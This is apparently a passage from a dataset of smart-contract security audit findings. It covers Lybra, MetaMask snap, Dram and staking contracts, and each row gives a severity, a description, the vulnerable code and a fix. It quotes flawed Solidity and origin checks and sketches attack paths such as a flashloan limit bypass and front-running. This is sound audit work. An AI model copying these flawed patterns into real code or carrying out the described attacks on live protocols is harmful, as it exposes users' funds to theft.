0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;\\n //Lido = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;\\n constructor(address \\_lido, address \\_asset, address \\_oracle, address \\_config) LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {\\n lido = Ilido(\\_lido);\\n }\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, ""DNL"");\\n uint256 sharesAmount = lido.submit{value: msg.value}(address(configurator));\\n require(sharesAmount != 0, ""ZERO\\_DEPOSIT"");\\n lido.approve(address(collateralAsset), msg.value);\\n uint256 wstETHAmount = IWstETH(address(collateralAsset)).wrap(msg.value);\\n depositedAsset[msg.sender] += wstETHAmount;\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,wstETHAmount, block.timestamp);\\n }\\n```\\n" +The Deployer of GovernanceTimelock Gets Privileged Access to the System.,high,"The `GovernanceTimelock` contract is responsible for Roles Based Access Control management and checks in the Lybra Protocol. It offers two functions specifically that check if an address has the required role - `checkRole` and checkOnlyRole:\\n```\\nfunction checkRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender) || hasRole(DAO, \\_sender);\\n}\\n\\nfunction checkOnlyRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender);\\n}\\n```\\n\\nIn `checkRole`, the contract also lets an address with the role `DAO` bypass the check altogether, making it a powerful role.\\nFor initial role management, when the `GovernanceTimelock` contract gets deployed, its constructor logic initializes a few roles, assigns relevant admin roles, and, notably, assigns the `DAO` role to the contract, and the `DAO` and the `GOV` role to the deployer.\\n```\\nconstructor(uint256 minDelay, address[] memory proposers, address[] memory executors, address admin) TimelockController(minDelay, proposers, executors, admin) {\\n \\n \\_setRoleAdmin(DAO, GOV);\\n \\_setRoleAdmin(TIMELOCK, GOV);\\n \\_setRoleAdmin(ADMIN, GOV);\\n \\_grantRole(DAO, address(this));\\n \\_grantRole(DAO, msg.sender);\\n \\_grantRole(GOV, msg.sender);\\n}\\n```\\n\\nThe assignment of such powerful roles to a single private key with the deployer has inherent risks. Specifically in our case, the `DAO` role alone as we saw may bypass many checks within the Lybra Protocol, and the `GOV` role even has role management privileges.\\nHowever, it does make sense to assign such roles at the beginning of the deployment to finish initialization and assign the rest of the roles. One could argue that having access to the `DAO` role in the early stages of the system's life could allow for quick disaster recovery in the event of incidents as well. Though, it is still dangerous to hold privileges for such a system in a single address as we have seen over the last years in security incidents that have to do with compromised keys.","While redesigning the deployment process to account for a lesser-privileged deployer would be ideal, the Lybra Finance team should at least transfer ownership as soon as the deployment is complete to minimize compromised private key risk.",,"```\\nfunction checkRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender) || hasRole(DAO, \\_sender);\\n}\\n\\nfunction checkOnlyRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender);\\n}\\n```\\n" +The configurator.getEUSDMaxLocked() Condition Can Be Bypassed During a Flashloan,medium,"When converting `EUSD` tokens to `peUSD`, there is a check that limits the total amount of `EUSD` that can be converted:\\n```\\nfunction convertToPeUSD(address user, uint256 eusdAmount) public {\\n require(\\_msgSender() == user || \\_msgSender() == address(this), ""MDM"");\\n require(eusdAmount != 0, ""ZA"");\\n require(EUSD.balanceOf(address(this)) + eusdAmount <= configurator.getEUSDMaxLocked(),""ESL"");\\n```\\n\\nThe issue is that there is a way to bypass this restriction. An attacker can get a flash loan (in EUSD) from this contract, essentially reducing the visible amount of locked tokens (EUSD.balanceOf(address(this))).",Multiple approaches can solve this issue. One would be adding reentrancy protection. Another one could be keeping track of the borrowed amount for a flashloan.,,"```\\nfunction convertToPeUSD(address user, uint256 eusdAmount) public {\\n require(\\_msgSender() == user || \\_msgSender() == address(this), ""MDM"");\\n require(eusdAmount != 0, ""ZA"");\\n require(EUSD.balanceOf(address(this)) + eusdAmount <= configurator.getEUSDMaxLocked(),""ESL"");\\n```\\n" +Liquidation Keepers Automatically Become eUSD Debt Providers for Other Liquidations.,medium,"One of the most important mechanisms in the Lybra Protocol is the liquidation of poorly collateralized vaults. For example, if a vault is found to have a collateralization ratio that is too small, a liquidator may provide debt tokens to the protocol and retrieve the vault collateral at a discount:\\n```\\nfunction liquidation(address provider, address onBehalfOf, uint256 assetAmount) external virtual {\\n uint256 assetPrice = getAssetPrice();\\n uint256 onBehalfOfCollateralRatio = (depositedAsset[onBehalfOf] \\* assetPrice \\* 100) / borrowed[onBehalfOf];\\n require(onBehalfOfCollateralRatio < badCollateralRatio, ""Borrowers collateral ratio should below badCollateralRatio"");\\n\\n require(assetAmount \\* 2 <= depositedAsset[onBehalfOf], ""a max of 50% collateral can be liquidated"");\\n require(EUSD.allowance(provider, address(this)) != 0, ""provider should authorize to provide liquidation EUSD"");\\n uint256 eusdAmount = (assetAmount \\* assetPrice) / 1e18;\\n\\n \\_repay(provider, onBehalfOf, eusdAmount);\\n uint256 reducedAsset = assetAmount \\* 11 / 10;\\n totalDepositedAsset -= reducedAsset;\\n depositedAsset[onBehalfOf] -= reducedAsset;\\n uint256 reward2keeper;\\n if (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n } else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n }\\n emit LiquidationRecord(provider, msg.sender, onBehalfOf, eusdAmount, reducedAsset, reward2keeper, false, block.timestamp);\\n}\\n```\\n\\nTo liquidate the vault, the liquidator needs to transfer debt tokens from the provider address, which in turn needs to have had approved allowance of the token for the vault:\\n```\\nrequire(EUSD.allowance(provider, address(this)) != 0, ""provider should authorize to provide liquidation EUSD"");\\n```\\n\\nThe allowance doesn't need to be large, it only needs to be non-zero. While it is true that in the `superLiquidation` function the allowance check is for `eusdAmount`, which is the amount associated with `assetAmount` (the requested amount of collateral to be liquidated), the liquidator could simply call the maximum of the allowance the provider has given to the vault and then repeat the liquidation process. The allowance does not actually decrease throughout the liquidation process.\\n```\\nrequire(EUSD.allowance(provider, address(this)) >= eusdAmount, ""provider should authorize to provide liquidation EUSD"");\\n```\\n\\nNotably, this address doesn't have to be the same one as the liquidator. In fact, there are no checks on whether the liquidator has an agreement or allowance from the provider to use their tokens in this particular vault's liquidation. The contract only checks to see if the provider has `EUSD` allowance for the vault, and how to split the rewards if the provider is different from the liquidator:\\n```\\nif (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n} else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n}\\n```\\n\\nIn fact, this is a design choice of the system to treat the allowance to the vault as an agreement to become a public provider of debt tokens for the liquidation process. It is important to note that there are incentives associated with being a provider as they get the collateral asset at a discount.\\nHowever, it is not obvious from documentation at the time of the audit nor the code that an address having a non-zero `EUSD` allowance for the vault automatically allows other users to use that address as a provider. Indeed, many general-purpose liquidator bots use their tokens during liquidations, using the same address for both the liquidator and the provider. As a result, this would put that address at the behest of any other user who would want to utilize these tokens in liquidations. The user might not be comfortable doing this trade in any case, even at a discount.\\nIn fact, due to this mechanism, even during consciously initiated liquidations MEV bots could spot this opportunity and front-run the liquidator's transaction. A frontrunner could put themselves as the keeper and the original user as the provider, grabbing the `reward2keeper` fee and leaving the original address with fewer rewards and failed gas after the liquidation.","While the mechanism is understood to be done for convenience and access to liquidity as a design decision, this could put unaware users in unfortunate situations of having performed a trade without explicit consent. Specifically, the MEV attack vector could be executed and repeated without fail by a capable actor monitoring the mempool. Consider having a separate, explicit flag for allowing others to use a user's tokens during liquidation, thus also accommodating solo liquidators by removing the MEV attack vector. Consider explicitly mentioning these mechanisms in the documentation as well.",,"```\\nfunction liquidation(address provider, address onBehalfOf, uint256 assetAmount) external virtual {\\n uint256 assetPrice = getAssetPrice();\\n uint256 onBehalfOfCollateralRatio = (depositedAsset[onBehalfOf] \\* assetPrice \\* 100) / borrowed[onBehalfOf];\\n require(onBehalfOfCollateralRatio < badCollateralRatio, ""Borrowers collateral ratio should below badCollateralRatio"");\\n\\n require(assetAmount \\* 2 <= depositedAsset[onBehalfOf], ""a max of 50% collateral can be liquidated"");\\n require(EUSD.allowance(provider, address(this)) != 0, ""provider should authorize to provide liquidation EUSD"");\\n uint256 eusdAmount = (assetAmount \\* assetPrice) / 1e18;\\n\\n \\_repay(provider, onBehalfOf, eusdAmount);\\n uint256 reducedAsset = assetAmount \\* 11 / 10;\\n totalDepositedAsset -= reducedAsset;\\n depositedAsset[onBehalfOf] -= reducedAsset;\\n uint256 reward2keeper;\\n if (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n } else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n }\\n emit LiquidationRecord(provider, msg.sender, onBehalfOf, eusdAmount, reducedAsset, reward2keeper, false, block.timestamp);\\n}\\n```\\n" +Use the Same Solidity Version Across Contracts.,low,Most contracts use the same Solidity version with `pragma solidity ^0.8.17`. The only exception is the `StakingRewardsV2` contract which has `pragma solidity ^0.8`.\\n```\\npragma solidity ^0.8;\\n```\\n,"If all contracts will be tested and utilized together, it would be best to utilize and document the same version within all contract code to avoid any issues and inconsistencies that may arise across Solidity versions.",,```\\npragma solidity ^0.8;\\n```\\n +Missing Events.,low,"In a few cases in the Lybra Protocol system, there are contracts that are missing events in significant scenarios, such as important configuration changes like a price oracle change. Consider implementing more events in the below examples.\\nNo events in the contract:\\n```\\ncontract esLBRBoost is Ownable {\\n esLBRLockSetting[] public esLBRLockSettings;\\n mapping(address => LockStatus) public userLockStatus;\\n IMiningIncentives public miningIncentives;\\n\\n // Define a struct for the lock settings\\n struct esLBRLockSetting {\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Define a struct for the user's lock status\\n struct LockStatus {\\n uint256 lockAmount;\\n uint256 unlockTime;\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Constructor to initialize the default lock settings\\n constructor(address \\_miningIncentives) {\\n```\\n\\nMissing an event during a premature unlock:\\n```\\nfunction unlockPrematurely() external {\\n require(block.timestamp + exitCycle - 3 days > time2fullRedemption[msg.sender], ""ENW"");\\n uint256 burnAmount = getReservedLBRForVesting(msg.sender) - getPreUnlockableAmount(msg.sender);\\n uint256 amount = getPreUnlockableAmount(msg.sender) + getClaimAbleLBR(msg.sender);\\n if (amount > 0) {\\n LBR.mint(msg.sender, amount);\\n }\\n unstakeRatio[msg.sender] = 0;\\n time2fullRedemption[msg.sender] = 0;\\n grabableAmount += burnAmount;\\n}\\n```\\n\\nMissing events for setting important configurations such as `setToken`, `setLBROracle`, and setPools:\\n```\\nfunction setToken(address \\_lbr, address \\_eslbr) external onlyOwner {\\n LBR = \\_lbr;\\n esLBR = \\_eslbr;\\n}\\n\\nfunction setLBROracle(address \\_lbrOracle) external onlyOwner {\\n lbrPriceFeed = AggregatorV3Interface(\\_lbrOracle);\\n}\\n\\nfunction setPools(address[] memory \\_vaults) external onlyOwner {\\n require(\\_vaults.length <= 10, ""EL"");\\n for (uint i = 0; i < \\_vaults.length; i++) {\\n require(configurator.mintVault(\\_vaults[i]), ""NOT\\_VAULT"");\\n }\\n vaults = \\_vaults;\\n}\\n```\\n\\nMissing events for setting important configurations such as `setRewardsDuration` and setBoost:\\n```\\n// Allows the owner to set the rewards duration\\nfunction setRewardsDuration(uint256 \\_duration) external onlyOwner {\\n require(finishAt < block.timestamp, ""reward duration not finished"");\\n duration = \\_duration;\\n}\\n\\n// Allows the owner to set the boost contract address\\nfunction setBoost(address \\_boost) external onlyOwner {\\n esLBRBoost = IesLBRBoost(\\_boost);\\n}\\n```\\n\\nMissing event during what is essentially staking `LBR` into `esLBR` (such as in ProtocolRewardsPool.stake()). Consider an appropriate event here such as StakeLBR:\\n```\\nif(useLBR) {\\n IesLBR(miningIncentives.LBR()).burn(msg.sender, lbrAmount);\\n IesLBR(miningIncentives.esLBR()).mint(msg.sender, lbrAmount);\\n}\\n```\\n",Implement additional events as appropriate.,,```\\ncontract esLBRBoost is Ownable {\\n esLBRLockSetting[] public esLBRLockSettings;\\n mapping(address => LockStatus) public userLockStatus;\\n IMiningIncentives public miningIncentives;\\n\\n // Define a struct for the lock settings\\n struct esLBRLockSetting {\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Define a struct for the user's lock status\\n struct LockStatus {\\n uint256 lockAmount;\\n uint256 unlockTime;\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Constructor to initialize the default lock settings\\n constructor(address \\_miningIncentives) {\\n```\\n +Incorrect Interfaces,low,"In a few cases, incorrect interfaces are used on top of contracts. Though the effect is the same as the contracts are just tokens and follow the same interfaces, it is best practice to implement correct interfaces.\\n`IPeUSD` is used instead of `IEUSD`\\n```\\nIPeUSD public EUSD;\\n```\\n\\n`IPeUSD` is used instead of `IEUSD`\\n```\\nif (address(EUSD) == address(0)) EUSD = IPeUSD(\\_eusd);\\n```\\n\\n`IesLBR` instead of `ILBR`\\n```\\nIesLBR public LBR;\\n```\\n\\n`IesLBR` instead of `ILBR`\\n```\\nLBR = IesLBR(\\_lbr);\\n```\\n",Implement correct interfaces for consistency.,,```\\nIPeUSD public EUSD;\\n```\\n +Production Builds Allow Development and Localhost Origins; Snap Does Not Enforce Transport Security,medium,"The snaps RPC access is restricted to certain origins only. However, there is no logic that disables development/test domains from origin checks in production builds.\\nSolflare Snap\\n../solflare-snap/src/index.js:L7-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nAptos Snap\\n../aptos-snap/src/index.js:L6-L15\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?risewallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nSui Snap\\n../sui-snap/src/index.js:L8-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?elliwallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n",Implement logic that removes development/localhost origin from the allow list for production builds. Employ strict checks on the format of provided origin. Do not by default allow all subdomains.,,"```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n" +Production Builds Allow Development and Localhost Origins; Snap Does Not Enforce Transport Security Partially Addressed,medium,"The snaps RPC access is restricted to certain origins only. However, there is no logic that disables development/test domains from origin checks in production builds.\\nSolflare Snap\\n../solflare-snap/src/index.js:L7-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nAptos Snap\\n../aptos-snap/src/index.js:L6-L15\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?risewallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nSui Snap\\n../sui-snap/src/index.js:L8-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?elliwallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n",Resolution\\nThe client has issued the following statement:\\nChangesets:\\nsolflare-wallet/solflare-snap@749d2b0\\nsolflare-wallet/aptos-snap@eef10b5\\nsolflare-wallet/sui-snap@898295f\\nStatement from the Assessment Team:\\nImplement logic that removes development/localhost origin from the allow list for production builds. Employ strict checks on the format of provided origin. Do not by default allow all subdomains.,,"```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n" +All Roles Are Set to the Same Account.,low,"From talking to the team we know that all roles will be held by different timelock contracts. In the code they all are initiated to the same `admin` address. That would mean that most roles would need to be transferred. Given that each transfer take 2 transactions and there are 3 roles to transfer that would equate to 6 transactions just to properly set up the contract on deployment. That also increments the time it would take and space for making errors.\\nIt is also should be noted that the `regulator` role is not being initialized there at all.\\n```\\n// solhint-disable-next-line func-name-mixedcase\\nfunction \\_\\_DramAccessControl\\_init\\_unchained(\\n address admin\\n) internal onlyInitializing {\\n \\_grantRole(ADMIN\\_ROLE, admin);\\n \\_grantRole(ROLE\\_MANAGER\\_ROLE, admin);\\n \\_grantRole(SUPPLY\\_MANAGER\\_ROLE, admin);\\n}\\n```\\n","Resolution\\nAll roles, including regulatory manager, are now set to different accounts. The modification can be found in commit `b70348e6998e35282212243ea639d174ced1ef2d`\\nWe suggest passing several addresses into the constructor and setting them to the correct addresses right away. Alternatively one can not set them at all and grant those roles later in order to avoid revoking the roles that admin should not have, such as `SUPPLY_MANAGER_ROLE`.",,"```\\n// solhint-disable-next-line func-name-mixedcase\\nfunction \\_\\_DramAccessControl\\_init\\_unchained(\\n address admin\\n) internal onlyInitializing {\\n \\_grantRole(ADMIN\\_ROLE, admin);\\n \\_grantRole(ROLE\\_MANAGER\\_ROLE, admin);\\n \\_grantRole(SUPPLY\\_MANAGER\\_ROLE, admin);\\n}\\n```\\n" +Setting MintCap to a Specific Value Is Prone to Front-Running.,low,"`Dram` stable coin is using the approval-like model to set the minting caps of different operators, thus it is prone to the same front-run issues as the approval mechanism. When using the `setMintCap` function directly operator could front-run the transaction and completely spend the old cap and then spend the new one again after setting the transaction goes through.\\n```\\nfunction setMintCap(\\n address operator,\\n uint256 amount\\n) external onlyRoleOrAdmin(ROLE\\_MANAGER\\_ROLE) {\\n \\_setMintCap(operator, amount);\\n}\\n```\\n\\nImagine the following scenario:\\nAlice has a mint cap of 10.\\nA transaction is sent to the mem-pool to set it to 5 (decrease the cap). The intent is that Alice should only be able to mint 5 tokens.\\nAlice frontruns this transaction and mints 10 tokens.\\nOnce transaction 2 goes through Alice mints 5 more tokens.\\nIn total Alice minted 15 tokens.",Avoid using setting the specific mint caps and rather use increase/decrease methods that are present in the code already.,,"```\\nfunction setMintCap(\\n address operator,\\n uint256 amount\\n) external onlyRoleOrAdmin(ROLE\\_MANAGER\\_ROLE) {\\n \\_setMintCap(operator, amount);\\n}\\n```\\n" +Incorrect Priviliges setOperatorAddresses Acknowledged,high,"The function `setOperatorAddresses` instead of allowing the Operator to update its own, as well as the Fee Recipient address, incorrectly provides the privileges to the Fee Recipient. As a result, the Fee Recipient can modify the operator address as and when needed, to DoS the operator and exploit the system. Additionally, upon reviewing the documentation, we found that there are no administrative rights defined for the Fee Recipient, hence highlighting the incorrect privilege allocation.\\n```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n","The modifier should be `onlyActiveOperatorOrAdmin` allowing only the operator itself or admin of the system, to update the necessary addresses.\\nAlso, for transferring crucial privileges from one address to another, the operator's address should follow a 2-step approach like transferring ownership.",,"```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n" +Unconstrained Snapshot While Setting Operator Limit,medium,"Function `setOperatorLimit` as the name says, allows the `SYS_ADMIN` to set/update the staking limit for an operator. The function ensures that if the limit is being increased, the `_snapshot` must be ahead of the last validator edit(block.number at which the last validator edit occurred). However, the parameter `_snapshot` is unconstrained and can be any number. Also, the functions `addValidators` and `removeValidators` update the `block.number` signifying the last validator edit, but never constrain the new edits with it. Since there are no publicly available functions to access this value, makes the functionality even more confusing and may be unnecessary.\\n```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n","If the functionality is not needed, consider removing it. Otherwise, add some necessary logic to either constrain the last validator edit or add public functions for the users to access it.",,```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n +Hardcoded Operator Limit Logic,medium,"The contract defines some hardcoded limits which is not the right approach for upgradeable contracts and opens doors for accidental mistakes, if not handled with care.\\nThe operators for the current version are limited to 1. If the auditee team decides to open the system to work with more operators but fails to change the limit while upgrading, the upgraded contract will have no effect, and will still disallow any more operators to be added.\\n```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n\\nAlso, the function `_depositOnOneOperator` hardcodes the operator Index as 0 since the contract only supports one operator.\\n```\\nfunction \\_depositOnOneOperator(uint256 \\_depositCount, uint256 \\_totalAvailableValidators) internal {\\n StakingContractStorageLib.setTotalAvailableValidators(\\_totalAvailableValidators - \\_depositCount);\\n \\_depositValidatorsOfOperator(0, \\_depositCount);\\n}\\n```\\n","A better approach could be to constrain the limit of operators that can be added with a storage variable or constant, provided at the time of contract initialization. The contract should also consider supporting dynamic operator deposits for future versions instead of the default hardcoded index.",,"```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n" +StakingContract - PubKey Length Checks Not Always Enforced,medium,"`addValidators` checks that the provided `bytes pubKey` is a multiple of the expected pubkey length while functions like `setWithdrawer` do not enforce similar length checks. This is an inconsistency that should be avoided.\\n`addValidators` enforcing input length checks\\n```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n\\n`setWithdrawer` accepting any length for a `pubKey`. Note that `_getPubKeyRoot` will take any input provided and concat it the zero bytes.\\n```\\n/// @notice Set withdrawer for public key\\n/// @dev Only callable by current public key withdrawer\\n/// @param \\_publicKey Public key to change withdrawer\\n/// @param \\_newWithdrawer New withdrawer address\\nfunction setWithdrawer(bytes calldata \\_publicKey, address \\_newWithdrawer) external {\\n if (!StakingContractStorageLib.getWithdrawerCustomizationEnabled()) {\\n revert Forbidden();\\n }\\n \\_checkAddress(\\_newWithdrawer);\\n bytes32 pubkeyRoot = \\_getPubKeyRoot(\\_publicKey);\\n StakingContractStorageLib.WithdrawersSlot storage withdrawers = StakingContractStorageLib.getWithdrawers();\\n\\n if (withdrawers.value[pubkeyRoot] != msg.sender) {\\n revert Unauthorized();\\n }\\n\\n emit ChangedWithdrawer(\\_publicKey, \\_newWithdrawer);\\n\\n withdrawers.value[pubkeyRoot] = \\_newWithdrawer;\\n}\\n```\\n\\n```\\nfunction \\_getPubKeyRoot(bytes memory \\_publicKey) internal pure returns (bytes32) {\\n return sha256(abi.encodePacked(\\_publicKey, bytes16(0)));\\n}\\n```\\n\\nsimilarly, the withdraw family of functions does not enforce a pubkey length either. However, it is unlikely that someone finds a pubkey that matches a root for the attackers address.\\n```\\n/// @notice Withdraw the Execution Layer Fee for a given validator public key\\n/// @dev Funds are sent to the withdrawer account\\n/// @param \\_publicKey Validator to withdraw Execution Layer Fees from\\nfunction withdrawELFee(bytes calldata \\_publicKey) external {\\n \\_onlyWithdrawerOrAdmin(\\_publicKey);\\n \\_deployAndWithdraw(\\_publicKey, EXECUTION\\_LAYER\\_SALT\\_PREFIX, StakingContractStorageLib.getELDispatcher());\\n}\\n```\\n\\nNevertheless, the methods should be hardened so as not to give a malicious actor the freedom to use an unexpected input size for the `pubKey` argument.","Enforce pubkey length checks when accepting a single pubkey as bytes similar to the batch functions that check for a multiple of ´PUBLIC_KEY_LENGTH´. Alternatively, declare the function argument as `bytes48` (however, in this case inputs may be auto-padded to fit the expected length, pot. covering situations that otherwise would throw an error)",,"```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n" +Unpredictable Behavior Due to Admin Front Running or General Bad Timing,medium,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nSome instances of this are more important than others, but in general, users of the system should have assurances about the behavior of the action they're about to take.\\nUpgradeable TU proxy\\nFee changes take effect immediately\\n```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n\\n```\\n/// @notice Change the Global fee\\n/// @param \\_globalFee Fee in Basis Point\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.",,```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > 